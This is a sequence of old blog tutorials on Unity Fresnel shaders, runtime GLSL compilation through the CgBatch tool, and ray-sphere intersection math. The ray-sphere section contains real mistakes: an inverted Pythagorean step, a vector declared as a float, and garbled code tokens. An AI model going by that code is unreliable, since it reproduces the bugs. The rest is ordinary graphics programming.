<p>So what does this look like in a shader? It’s actually very simple. First, you need to calculate the value of R. For this example, we’ll do that in the vertex shader:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">vOUT</span> <span class="nf">vert</span><span class="p">(</span><span class="n">vIN</span> <span class="n">v</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">vOUT</span> <span class="n">o</span><span class="p">;</span>
<span class="n">o</span><span class="p">.</span><span class="n">pos</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">UNITY_MATRIX_MVP</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">uv</span> <span class="o">=</span> <span class="n">v</span><span class="p">.</span><span class="n">texcoord</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">posWorld</span> <span class="o">=</span> <span class="n">mul</span><span class="p">(</span><span class="n">_Object2World</span><span class="p">,</span> <span class="n">v</span><span class="p">.</span><span class="n">vertex</span><span class="p">).</span><span class="n">xyz</span><span class="p">;</span>
<span class="n">float3</span> <span class="n">normWorld</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">mul</span><span class="p">(</span><span class="n">float3x3</span><span class="p">(</span><span class="n">_Object2World</span><span class="p">),</span> <span class="n">v</span><span class="p">.</span><span class="n">normal</span><span class="p">));</span>
<span class="n">float3</span> <span class="n">I</span> <span class="o">=</span> <span class="n">normalize</span><span class="p">(</span><span class="n">posWorld</span> <span class="o">-</span> <span class="n">_WorldSpaceCameraPos</span><span class="p">.</span><span class="n">xyz</span><span class="p">);</span>
<span class="n">o</span><span class="p">.</span><span class="n">R</span> <span class="o">=</span> <span class="n">_Bias</span> <span class="o">+</span> <span class="n">_Scale</span> <span class="o">*</span> <span class="n">pow</span><span class="p">(</span><span class="mf">1.0</span> <span class="o">+</span> <span class="n">dot</span><span class="p">(</span><span class="n">I</span><span class="p">,</span> <span class="n">normWorld</span><span class="p">),</span> <span class="n">_Power</span><span class="p">);</span>
<span class="k">return</span> <span class="n">o</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>There isn’t too much to say about this, since it’s pretty much the equation above verbatim. One handy tip though: I’ve found that I’ve been perfectly happy with the results I get if I omit the bias parameter entirely, and doing so makes it more difficult to produce wonky results.</p>
<p>Once you have the R value calculated, the rest of the implementation is just a lerp in the fragment shader:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">float4</span> <span class="nf">frag</span><span class="p">(</span><span class="n">vOUT</span> <span class="n">i</span><span class="p">)</span> <span class="o">:</span> <span class="n">COLOR</span>
<span class="p">{</span>
<span class="n">float4</span> <span class="n">col</span> <span class="o">=</span> <span class="n">tex2D</span><span class="p">(</span><span class="n">_MainTex</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">uv</span><span class="p">.</span><span class="n">xy</span> <span class="o">*</span> <span class="n">_MainTex_ST</span><span class="p">.</span><span class="n">xy</span> <span class="o">+</span> <span class="n">_MainTex_ST</span><span class="p">.</span><span class="n">zw</span><span class="p">);</span>
<span class="k">return</span> <span class="nf">lerp</span><span class="p">(</span><span class="n">col</span><span class="p">,</span><span class="n">_Color</span><span class="p">,</span> <span class="n">i</span><span class="p">.</span><span class="n">R</span><span class="p">);</span>
<span class="err">}</span></code></pre></figure>
<p>If you’re not a Unity programmer, ignore all the _MainTex_ST stuff, that’s just a unity specific bit of code to handle tiling textures across an object.</p>
<p>Otherwise, all that’s new here is the lerp function. In this example, rather than reflecting anything, our Fresnel Rim is just a single color (_Color), but the principle is the same. If you wanted to turn the rim into a reflection, you’d simply replace the _Color variable with a color sampled from a cube map, or taken from a camera, or however else you want to pass in a reflection.</p>
<p>Otherwise though, this is all there is to it to write a simple Fresnel shader, so go forth and make all of your objects more believable! And feel free to download the Fresnel Shader Pack that I’ve posted in the graphics section of this site to see some examples of more complicated Fresnel effects.</p>
<p>If you’ve spotted an error on here, or have anything to add, feel free to send me a message <a href="http://twitter.com/khalladay">on twitter</a>. Happy shading!</p>
Creating GLSL Shaders at Runtime in Unity3D2014-01-12T00:00:00+00:00http://kylehalladay.com/blog/tutorial/bestof/2014/01/12/Runtime-Shader-Compilation-Unity<div style="background-color:#EEAAAA;">NOTE: This article is for an old version of Unity (Unity 4...sometime in 2014) and probably won't run anymore. Beware!
</div>
<p><br /></p>
<p>The feeling of solving a problem that seems potentially impossible is awesome. My latest project is no exception.</p>
<p>The concept involves users being able to write shaders while the program is running, and compiling them at runtime onto objects in the scene. Normally this wouldn’t be an unreasonable task, however this project is being built in Unity, which complicates things immensely.</p>
<p>I had seen an example of shaderlab code being passed to the Material constructor at runtime before, but I hadn’t ever seen anyone play around with any other shader language in the same way. It turns out that’s because you can’t. The <a href="http://docs.unity3d.com/Documentation/ScriptReference/Material-ctor.html">Material constructor</a> that I was hoping to use only accepts Shaderlab; Unity doesn’t support runtime compilation of GLSL, Cg, or HLSL, end of story.</p>
<p>Except that isn’t the whole story. If it was, this would be a very short post. It turns out that with some elbow grease, you can actually get other languages (or at least GLSL) to compile. The rest of this post is going to show you how.</p>
<div align="center">
<img src="/images/post_images/2014-01-20/shadercompilation.png" /><br />
<font size="2">Type the fragment shader into the box, hit the button, watch the magic happen</font>
</div>
<p><br /></p>
<h3>Setting Up Your Project</h3>
<p>There are at least a few people who have tried to make this work before. A quick google search for “runtime shader compilation unity” will bring you to <a href="http://forum.unity3d.com/threads/87085-Runtime-shader-compilation">this Unity forum post</a>. If you scroll down you’ll find a post from a user named Sirithang, who is the real unsung hero of this post.</p>
<p>Their post talks about a tool called CgBatch, which is included with Unity, and according to <a href="http://www.realtimerendering.com/downloads/MobileCrossPlatformChallenges_siggraph.pdf">this SIGGRAPH presentation</a>, is either the entire shader compilation pipeline for Unity, or is at least one step in it. The siggraph link only describes it as a tool to generate HLSL, but in practice it seems to fully translate shaders into a format accepted by that material constructor from above. Since CgBatch isn’t meant for public use, there isn’t anything in the way of documentation to know for sure.</p>
<p>Ok, so we know we need to use CgBatch, but where do we get it. On Mac, you can find it inside of Unity.app (right click and select “Show Package Contents”), inside the Tools folder. On Windows, you’re looking for CgBatch.exe, located in Unity/Editor/Data/Tools. Thanks to <a href="https://twitter.com/izaleu">@izaleu</a> for finding this on Windows :D ). Create a folder inside your project’s StreamingAssets directory and paste CgBatch into it (it must be inside subdirectory of StreamingAssets).</p>
<p>CgBatch also relies on Cg.framework, which you can find in the Unity.app/Contents/Frameworks folder. If you try to run CgBatch however, you’ll notice that it actually relies on Cg.framework being located in “../Frameworks/Cg.framework”, so copy and paste the entire folder into your project’s StreamingAssets folder.</p>
<p>Finally, you will need to provide a path to the CGInclude files as part of using CgBatch, and since we don’t want our users to have to have Unity installed to use our program, you will also need to copy the CGIncludes folder to your StreamingAssets directory.</p>
<p><strong>Aside:</strong> If you’ve never used the StreamingAssets folder before, it is simply a folder that you place in your project’s assets folder, name “StreamingAssets,” everything in this folder will be included exactly as is in your built project’s Application.streamingAssetsPath.</p>
<h3>Deciphering CgBatch</h3>
<p>So how do you use CgBatch. If you’ve attempted to run it from the command line you’ve probably seen the following message:
<br /></p>
<div align="center">
<i>E -1: Failed to launch CgBatch (incorrect parameters). Usage: CgBatch input path includepath output [-xbox360] [-ps3]</i>
</div>
<p><br />
So CgBatch needs at least 4 parameters. Based on the forum post linked previously, these arguments are as follows:</p>
<ul>
<li><strong>input</strong> : The path to your uncompiled shader file</li>
<li><strong>path</strong> : The path to the directory that contains your shader</li>
<li><strong>includepath</strong> : The path to the CGInclude files for Unity</li>
<li><strong>output</strong> : Where to put the output shader file.</li>
</ul>
<p>If you run this with the appropriate parameters, you should be able to get output that can be accepted by the Material shader string constructor, which is great! So now we need to be able to do this inside a running program.</p>
<h3>Introducing System.Diagnostics</h3>
<p>Thankfully, Mono has us covered (even on Mac!). The Process class (inside System.Diagnostics) is specifically designed to run command line applications, and can be configured to execute programs in bash as well as the windows command line.</p>
<p>The way to do this is to create a new Process object, and use that object’s StartInfo property to specify exactly what command and arguments you wish to execute, and then call Process.Start();</p>
<p>In practice, this looks like the following:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#"><span class="k">using</span> <span class="nn">System.Diagnostics</span><span class="p">;</span>
<span class="n">Process</span> <span class="n">process</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">Process</span><span class="p">();</span>
<span class="n">process</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">FileName</span> <span class="p">=</span> <span class="s">"bash"</span><span class="p">;</span>
<span class="n">process</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">Arguments</span> <span class="p">=</span> <span class="s">"-c '"</span> <span class="p">+</span> <span class="p">[</span><span class="n">Command</span><span class="p">]</span> <span class="p">[</span><span class="n">arg1</span><span class="p">]</span> <span class="p">[</span><span class="n">arg2</span><span class="p">]</span> <span class="p">...</span> <span class="p">+</span><span class="s">"'"</span><span class="p">;</span>
<span class="n">process</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">RedirectStandardOutput</span> <span class="p">=</span> <span class="k">true</span><span class="p">;</span>
<span class="n">process</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">UseShellExecute</span> <span class="p">=</span> <span class="k">false</span><span class="p">;</span>
<span class="n">process</span><span class="p">.</span><span class="nf">Start</span><span class="p">();</span></code></pre></figure>
<p>(the above is mac specific, I don’t have a windows machine to work try this stuff out on right now)</p>
<p>As shown above, the name of the command that you need to execute is actually bash, and not CgBatch. In order to execute a command from batch, you need to pass that as an argument to bash using the -c flag, and enclosing the command and all its arguments inside single quotes.</p>
<p>Setting RedirectStandardOutput to true allows us to read the output of the command into the Unity console (really handy for debugging), but in order for that to work, UseShellExecute needs to be set to false, which means that we will not be using the operating system shell to launch the program (in this case bash), we will launch bash directly.</p>
<h3>Actually Making This Work</h3>
<p>Now we have our tools set up, we now how to execute CgBatch, it’s time to put it all together.</p>
<p>For the proof of concept, I only wanted users to write fragment shaders, so I needed to provide a vertex shader for them:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">
<span class="kt">string</span> <span class="n">prefix</span> <span class="p">=</span> <span class="s">"Shader \"Temp\"{\nProperties{\n}\nSubShader {"</span> <span class="p">+</span>
<span class="s">"\nTags { \"Queue\" = \"Geometry\" }\nPass {\nGLSLPROGRAM\n#ifdef VERTEX\n"</span> <span class="p">+</span>
<span class="s">"void main(){\n"</span> <span class="p">+</span>
<span class="s">"gl_Position = gl_ModelViewProjectionMatrix * gl_Vertex;\n"</span> <span class="p">+</span>
<span class="s">"}\n"</span> <span class="p">+</span>
<span class="s">"#endif\n"</span> <span class="p">+</span>
<span class="s">"#ifdef FRAGMENT\n"</span> <span class="p">+</span>
<span class="s">"uniform float _time;\n"</span><span class="p">;</span>
</code></pre></figure>
<p>The above example is for writing a glsl shader at runtime. I haven’t yet been able to get Cg compiling using the method presented in this post, but I’m sure it can be done with the right arguments to CgBatch.</p>
<p>You’ll notice I’m also including a uniform for Time. This is because I have yet to figure out how to get Unity’s specific constants to be recognized in the User written shader, and Time is useful enough that I’m passing it in myself (just call the Shader.SetGlobalFloat argument in Update to do the same).</p>
<p>Next up, we need to write the code that will come after the user’s fragment shader to finish off the shader file:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">
<span class="kt">string</span> <span class="n">suffix</span> <span class="p">=</span> <span class="s">"\n#endif\nENDGLSL}}}"</span><span class="p">;</span></code></pre></figure>
<p>As the variable names suggest, the user’s fragment shader will be positioned in between these two strings when building our input file.</p>
<p>Get the user input however you see fit (I as the picture earlier showed, I’m using Unity.GUI for now), and then assemble the full file string with prefix+USERINPUT+suffix.</p>
<p>Once you’ve assembled the full shader string, you need to write it to a file, since CgBatch expects the input parameter to be a file path. Since we don’t want this file to persist between runs, I’m writing the input file to Application.temporaryCachePath.</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">
<span class="kt">byte</span><span class="p">[]</span> <span class="n">byteShader</span> <span class="p">=</span> <span class="n">System</span><span class="p">.</span><span class="n">Text</span><span class="p">.</span><span class="n">Encoding</span><span class="p">.</span><span class="n">UTF8</span><span class="p">.</span><span class="nf">GetBytes</span><span class="p">(</span><span class="n">prefix</span><span class="p">+</span><span class="n">shader</span><span class="p">+</span><span class="n">suffix</span><span class="p">);</span>
<span class="kt">var</span> <span class="n">tempShader</span> <span class="p">=</span> <span class="n">File</span><span class="p">.</span><span class="nf">Create</span><span class="p">(</span><span class="n">Application</span><span class="p">.</span><span class="n">temporaryCachePath</span><span class="p">+</span><span class="s">"/tempshader.shader"</span><span class="p">);</span>
<span class="n">tempShader</span><span class="p">.</span><span class="nf">Write</span><span class="p">(</span><span class="n">byteShader</span><span class="p">,</span><span class="m">0</span><span class="p">,(</span><span class="n">prefix</span><span class="p">+</span><span class="n">suffix</span><span class="p">+</span><span class="n">shader</span><span class="p">).</span><span class="n">Length</span><span class="p">);</span>
<span class="n">tempShader</span><span class="p">.</span><span class="nf">Close</span><span class="p">();</span></code></pre></figure>
<p>Finally, we need to read in the output and actually build a material out of it. All together, the shader compilation process looks like the following:</p>
<figure class="highlight"><pre><code class="language-c#" data-lang="c#">
<span class="kt">byte</span><span class="p">[]</span> <span class="n">byteShader</span> <span class="p">=</span> <span class="n">System</span><span class="p">.</span><span class="n">Text</span><span class="p">.</span><span class="n">Encoding</span><span class="p">.</span><span class="n">UTF8</span><span class="p">.</span><span class="nf">GetBytes</span><span class="p">(</span><span class="n">prefix</span><span class="p">+</span><span class="n">shader</span><span class="p">+</span><span class="n">suffix</span><span class="p">);</span>
<span class="kt">var</span> <span class="n">tempShader</span> <span class="p">=</span> <span class="n">File</span><span class="p">.</span><span class="nf">Create</span><span class="p">(</span><span class="n">Application</span><span class="p">.</span><span class="n">temporaryCachePath</span><span class="p">+</span><span class="s">"/tempshader.shader"</span><span class="p">);</span>
<span class="n">tempShader</span><span class="p">.</span><span class="nf">Write</span><span class="p">(</span><span class="n">byteShader</span><span class="p">,</span><span class="m">0</span><span class="p">,(</span><span class="n">prefix</span><span class="p">+</span><span class="n">suffix</span><span class="p">+</span><span class="n">shader</span><span class="p">).</span><span class="n">Length</span><span class="p">);</span>
<span class="n">tempShader</span><span class="p">.</span><span class="nf">Close</span><span class="p">();</span>
<span class="n">Process</span> <span class="n">compileProcess</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">Process</span><span class="p">();</span>
<span class="n">compileProcess</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">FileName</span> <span class="p">=</span> <span class="s">"bash"</span><span class="p">;</span>
<span class="n">compileProcess</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">Arguments</span> <span class="p">=</span> <span class="s">"-c '"</span>
<span class="p">+</span><span class="n">Application</span><span class="p">.</span><span class="n">streamingAssetsPath</span>
<span class="p">+</span><span class="s">"/Tools/CGBatch "</span>
<span class="p">+</span><span class="n">Application</span><span class="p">.</span><span class="n">temporaryCachePath</span>
<span class="p">+</span><span class="s">"/tempshader.shader ../CGIncludes/ ../CGIncludes/"</span>
<span class="p">+</span><span class="n">Application</span><span class="p">.</span><span class="n">temporaryCachePath</span>
<span class="p">+</span><span class="s">"/testOutput.shader'"</span><span class="p">;</span>
<span class="n">compileProcess</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">RedirectStandardOutput</span> <span class="p">=</span> <span class="k">true</span><span class="p">;</span>
<span class="n">compileProcess</span><span class="p">.</span><span class="n">StartInfo</span><span class="p">.</span><span class="n">UseShellExecute</span> <span class="p">=</span> <span class="k">false</span><span class="p">;</span>
<span class="n">compileProcess</span><span class="p">.</span><span class="nf">Start</span><span class="p">();</span>
<span class="kt">var</span> <span class="n">output</span> <span class="p">=</span> <span class="n">compileProcess</span><span class="p">.</span><span class="n">StandardOutput</span><span class="p">.</span><span class="nf">ReadToEnd</span><span class="p">();</span>
<span class="n">compileProcess</span><span class="p">.</span><span class="nf">WaitForExit</span><span class="p">();</span>
<span class="kt">string</span> <span class="n">compiled</span> <span class="p">=</span> <span class="n">File</span><span class="p">.</span><span class="nf">ReadAllText</span><span class="p">(</span><span class="n">Application</span><span class="p">.</span><span class="n">temporaryCachePath</span>
<span class="p">+</span><span class="s">"/testOutput.shader"</span><span class="p">);</span>
<span class="n">Material</span> <span class="n">m</span> <span class="p">=</span> <span class="k">new</span> <span class="nf">Material</span><span class="p">(</span><span class="n">compiled</span><span class="p">);</span>
<span class="n">cube</span><span class="p">.</span><span class="n">renderer</span><span class="p">.</span><span class="n">material</span> <span class="p">=</span> <span class="n">m</span><span class="p">;</span>
<span class="n">UnityEngine</span><span class="p">.</span><span class="n">Debug</span><span class="p">.</span><span class="nf">Log</span><span class="p">(</span><span class="n">output</span><span class="p">);</span></code></pre></figure>
<p>The above has only been tested on mac. On Windows, you will need to replace “bash” with “cmd” and the arguments with whatever is appropriate for your system. I unfortunately don’t have a Windows machine to test it out (again, send me a message <a href="http://twitter.com/khalladay">on twitter</a> and I’ll update this).</p>
<p>But, provided you’re on Mac, or have figured out the Windows changes, you should now be able to compile GLSL at runtime! You laugh in the face of Unity not supporting this feature!</p>
<p>You may also notice that your build product is 50MB larger than you expect. This is because we’re including all of Cg.framework with our project so that CgBatch can use it during compilation. I expect that this extra file size is one of a number of reasons that Unity has opted to leave this feature out by default.</p>
<p>That’s all for now! Hopefully this wall of text has opened up a whole world of experimental gameplay to you! I’d love to hear about any improvements to the above, any further knowledge about CgBatch, and especially any other tricks like this that allow weird stuff to be done in my favourite engine, so as I’ve said twice already, <a href="http://twitter.com/khalladay">TWITTER!</a></p>
Ray-Sphere Intersection with Simple Math2013-12-24T00:00:00+00:00http://kylehalladay.com/blog/tutorial/math/2013/12/24/Ray-Sphere-Intersection<div style="background-color:#EEAAAA;">NOTE: This article is OLD! (From 2013!). Information in it may be out of date or outright useless, and I have no plans to update it. Beware!
</div>
<p><br /></p>
<p>Lately I’ve been working on a ray tracer. It’s been going well (or at least as well as I could hope my first renderer could go), but it has been a slow process. I don’t have a formal math background - my day to day work only ever goes as far as enough linear algebra to write shaders, and enough of everything else to implement whatever gameplay I need - and none of this prepared me for the endless pages of ray tracing resources that expected much more math knowledge than I have.</p>
<div align="center">
<img src="/images/post_images/2013-12-24/traceoutput.png" /><br />
<font size="2">
The current output of my ray tracer
</font>
</div>
<p><br /></p>
<p>So I thought that I’d do my part for the next person who starts writing a ray tracer, and share a bit of what I’ve figured out in as much detail as possible, as clearly as possible.</p>
<p>As the title of this post suggests, the end product of this post will be a function which will take a ray and a sphere, and return both if the they intersect, and if so, the location of the intersection(s).</p>
<h2>What you need to know before starting</h2>
<p>I’m going to try to keep things as basic as possible. In order to follow this post, you’ll need:</p>
<ul>
<li>a basic understanding of trigonometry</li>
<li>a good handle on vector math (including dot products)</li>
</ul>
<p>Have you got that? Good! If not, there are a bazillion resources online, go check one of them out before proceeding.</p>
<h2>Representing our objects</h2>
<p>The first thing we need to get a handle on is how to best represent a ray. If you recall from high school geometry, a ray consists of a single point (the origin), and extends from that origin indefinitely along a direction vector. So for our purposes, a ray is simply a struct which consists of an origin vector and a direction vector.</p>
<pre><code>struct Ray
{
vec3 origin;
vec3 direction;
};
</code></pre>
<p>With these 2 vectors, we can represent any point on the ray like this:</p>
<div align="center">
Origin + Direction * t = Point
</div>
<p><br />
Each point will have a specific t value, representing how far along the direction vector the point lies, but the equation remains the same otherwise. This will be important later, so make sure that you try this out on paper and really understand it before proceeding.</p>
<div align="center">
<img src="/images/post_images/2013-12-24/raysphere2.png" /><br />
</div>
<p><br /></p>
<p>Spheres are even simpler. Given that spheres don’t have a direction, all we need is the location of the center point, and the radius of the sphere. This means our sphere object will simply be a struct containing one vector and one float.</p>
<pre><code>struct Sphere
{
vec3 center;
float radius;
};
</code></pre>
<h2>Turning Vectors into Scalar Values</h2>
<p><br /></p>
<div align="center">
<img src="/images/post_images/2013-12-24/raysphere1.png" /><br />
</div>
<p><br /></p>
<p>Alright, so the image above shows the general lay of the problem. We have a ray, and a sphere, we know the ray’s origin point, and it’s direction, and we know the location of the sphere’s center point. What we want to do, is determine if the ray will ever intersect the sphere (spoiler: in this tutorial, it will), and if so, where that intersection occurs.</p>
<p>There are 2 points that I haven’t mentioned yet, labelled above as P1 and P2, these are the points that we want to solve for, as both of these represent a point of intersection.</p>
<p>Speaking of those points, remember that we can solve for any point on a ray with the following equation:</p>
<div align="center">
Origin + Direction * t = Point
</div>
<p><br />
So, in order to get the locations of the P0 and P1, all we need to do is find the correct t value for each of them. This is going to make our lives a lot easier, provided you remember a bit of trig (don’t worry, I didn’t either, we’ll go over it as we get to it), since now all we need to do is find 1 number for each point, instead of their exact co-ordinates.</p>
<div align="center">
<img src="/images/post_images/2013-12-24/raysphere1-2.png" /><br />
</div>
<p><br /></p>
<p>While we’re identifying values to solve for, there are two more t values that are important to us, shown below in blue and green, tc is the distance from the origin to the a point on the ray halfway between the 2 intersection points, and t1c is the distance between t1 and tc. We’ll see why these are important in a minute.</p>
<p>To review these t values have been labelled t1, t2, tc and t1c. t1 and t2 correspond to the points P1 and P2 on our diagram, tc represents the t value to the center and t1c is the distance between P1 and tc.</p>
<h2>Finding tc</h2>
<p>As the headline suggests, the first value we need to solve for is tc. As the diagram below shows, the first step to finding tc is to create a right angle triangle, using tc, the vector from the sphere’s center to the ray’s origin, and a line (d) from the center to the ray.</p>
<div align="center">
<img src="/images/post_images/2013-12-24/raysphere4.png" /><br />
</div>
<p><br /></p>
<p>The first thing we need to find is the length of L. This is simple enough, since we know the positions of both the center and ray origin.</p>
<div align="center">
L = C - Origin
</div>
<p><br /></p>
<p>Once we have L, we can use the dot product between L and the ray’s direction in order to get the value for tc. Don’t worry if this seems unintuitive, it had been awhile since I used dot product for projections too. Luckily there are lots of good resources out there that explain this concept (like this one). Moving on though, this means that we have found the value for tc:</p>
<div align="center">
tc = L · Direction
</div>
<p><br /></p>
<p>This is an important calculation. If the result of this is that tc is less than 0, it means that the ray does not intersect the sphere, and we can bail out of our intersection test early. If it’s not less than 0, we move on.</p>
<p>The last thing we need to do with this triangle is solve for the length of d. This isn’t important for tc, but will be in the next section, so we may as well do it now while we’re still thinking about this triangle.</p>
<p>To solve for d, we need to bust out some high school math. If you’re like me, you’ll need a bit of a refresher on this, and I found that it was helpful to rotate our triangle around bit to put it in a more familiar orientation.</p>
<div align="center">
<img src="/images/post_images/2013-12-24/raysphere5.png" /><br />
</div>
<p><br /></p>
<p>Looking familiar yet? If you can remember Pythagoras’ Theorem, you’ll already know where I’m going with this. If not, I’ll help:</p>
<div align="center">
a² + b² = c²
</div>
<p><br /></p>
<p>We need to find d, which in this case is edge b, so we need to rearrange the equation a bit:</p>
<div align="center">
b² = c² - a²<br />
b = √(c² - a²)<br />
</div>
<p><br /></p>
<p>Now we just sub in our known values from earlier</p>
<div align="center">
d = √(tc² - L²)
</div>
<p><br /></p>
<p>Just like tc before it, this is an important calculation. If d is greater than the radius of our sphere, it means that t1c will give us a point outside of the sphere, and our ray doesn’t intersect at all (and we can go home early).</p>
<p>If not, great! Time to move on to the next triangle.</p>
<h2>Solving for t1c</h2>
<p><br /></p>
<div align="center">
<img src="/images/post_images/2013-12-24/raysphere6.png" /><br />
</div>
<p><br />
Now that we have tc and d, this is actually incredibly easy. Since a² + b² = c², we already know the length of the edge labelled h (it’s the radius of the sphere) and the length of d. Using Pythagoras’ Theorem again gives us:</p>
<div align="center">
a² = c² - b² <br />
a = √(c² - b²) <br />
t1c = √(radius² - d²) <br />
</div>
<p><br /></p>
<p>Guess that means it’s time to move on to yet another subheading eh?</p>
<h2>Solving for t1 and t2</h2>
<p>Let’s look at our original diagram again:</p>
<div align="center">
<img src="/images/post_images/2013-12-24/raysphere7.png" /><br />
</div>
<p>Notice anything? Now that we have values for t1c and tc, solving for the two variables we actually want is trivial!</p>
<div align="center">
t1 = tc - t1c
<br />
t2 = tc + t1c
<br />
</div>
<p><br /></p>
<p>Which means that all we need to do to get our intersection points is:</p>
<div align="center">
P1 = Origin + Direction * t1
<br />
P2 = Origin + Direction * t2
</div>
<p><br /></p>
<h2>An Intersect Function</h2>
<p><br />
Congratulations on getting this far! Now that we have all that theory out of the way, it’s time for your prize: a sphere intersection function! Let’s see what that might look like if we simply went step by step using the instructions above:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++">
<span class="kt">bool</span> <span class="n">intersec</span><span class="o">++</span><span class="p">(</span><span class="n">Ray</span><span class="o">*</span> <span class="n">r</span><span class="p">,</span> <span class="n">Sphere</span><span class="o">*</span> <span class="n">s</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//solve for tc</span>
<span class="kt">float</span> <span class="n">L</span> <span class="o">=</span> <span class="n">s</span><span class="o">-></span><span class="n">center</span> <span class="o">-</span> <span class="n">r</span><span class="o">-></span><span class="n">origin</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">tc</span> <span class="o">=</span> <span class="n">dot</span><span class="p">(</span><span class="n">L</span><span class="p">,</span> <span class="n">r</span><span class="o">-></span><span class="n">direction</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">tc</span> <span class="o"><</span> <span class="mf">0.0</span> <span class="p">)</span> <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">d</span> <span class="o">=</span> <span class="n">sqrt</span><span class="p">((</span><span class="n">tc</span><span class="o">*</span><span class="n">tc</span><span class="p">)</span> <span class="o">-</span> <span class="p">(</span><span class="n">L</span><span class="o">*</span><span class="n">L</span><span class="p">));</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">d</span> <span class="o">></span> <span class="n">s</span><span class="o">-></span><span class="n">radius</span><span class="p">)</span> <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="c1">//solve for t1c</span>
<span class="kt">float</span> <span class="n">t1c</span> <span class="o">=</span> <span class="n">sqrt</span><span class="p">(</span> <span class="p">(</span><span class="n">s</span><span class="o">-></span><span class="n">radius</span> <span class="o">*</span> <span class="n">s</span><span class="o">-></span><span class="n">radius</span><span class="p">)</span> <span class="o">-</span> <span class="p">(</span><span class="n">d</span><span class="o">*</span><span class="n">d</span><span class="p">)</span> <span class="p">);</span>
<span class="c1">//solve for intersection points</span>
<span class="kt">float</span> <span class="n">t1</span> <span class="o">=</span> <span class="n">tc</span> <span class="o">-</span> <span class="n">t1c</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">t2</span> <span class="o">=</span> <span class="n">tc</span> <span class="o">+</span> <span class="n">t1c</span><span class="p">;</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>For really basic use cases, the above may be sufficient, but there’s an awful lot of wasted effort up there (like calculation t1 and t2 and then not using them). For a ray tracer (the use case that led me to writing this post) it isn’t enough just to know if a ray hits an object, you need to know exactly where the point of contact is.</p>
<p>So let’s rethink the above function (and optimize it in the process):</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++">
<span class="kt">bool</span> <span class="nf">intersect</span><span class="p">(</span><span class="n">Ray</span><span class="o">*</span> <span class="n">r</span><span class="p">,</span> <span class="n">Sphere</span><span class="o">*</span> <span class="n">s</span><span class="p">,</span> <span class="kt">float</span><span class="o">*</span> <span class="n">t1</span><span class="p">,</span> <span class="kt">float</span> <span class="o">*</span><span class="n">t2</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//solve for tc</span>
<span class="kt">float</span> <span class="n">L</span> <span class="o">=</span> <span class="n">s</span><span class="o">-></span><span class="n">center</span> <span class="o">-</span> <span class="n">r</span><span class="o">-></span><span class="n">origin</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">tc</span> <span class="o">=</span> <span class="n">dot</span><span class="p">(</span><span class="n">L</span><span class="p">,</span> <span class="n">r</span><span class="o">-></span><span class="n">direction</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">tc</span> <span class="o">&</span><span class="n">lt</span><span class="p">;</span> <span class="mf">0.0</span> <span class="p">)</span> <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="kt">float</span> <span class="n">d2</span> <span class="o">=</span> <span class="p">(</span><span class="n">tc</span><span class="o">*</span><span class="n">tc</span><span class="p">)</span> <span class="o">-</span> <span class="p">(</span><span class="n">L</span><span class="o">*</span><span class="n">L</span><span class="p">);</span>
<span class="kt">float</span> <span class="n">radius2</span> <span class="o">=</span> <span class="n">s</span><span class="o">-></span><span class="n">radius</span> <span class="o">*</span> <span class="n">s</span><span class="o">-></span><span class="n">radius</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">d2</span> <span class="o">></span> <span class="n">radius2</span><span class="p">)</span> <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="c1">//solve for t1c</span>
<span class="kt">float</span> <span class="n">t1c</span> <span class="o">=</span> <span class="n">sqrt</span><span class="p">(</span> <span class="n">radius2</span> <span class="o">-</span> <span class="n">d2</span> <span class="p">);</span>
<span class="c1">//solve for intersection points</span>
<span class="o">*</span><span class="n">t1</span> <span class="o">=</span> <span class="n">tc</span> <span class="o">-</span> <span class="n">t1c</span><span class="p">;</span>
<span class="o">*</span><span class="n">t2</span> <span class="o">=</span> <span class="n">tc</span> <span class="o">+</span> <span class="n">t1c</span><span class="p">;</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
<p>Much better! Not only are we returning getting the solved t values out of the function, but we’ve also managed to get rid of a costly square root operation. This may not seem like a big deal, but when you factor in how many times you will be calling this intersect function, any optimizations you can make pay dividends.</p>
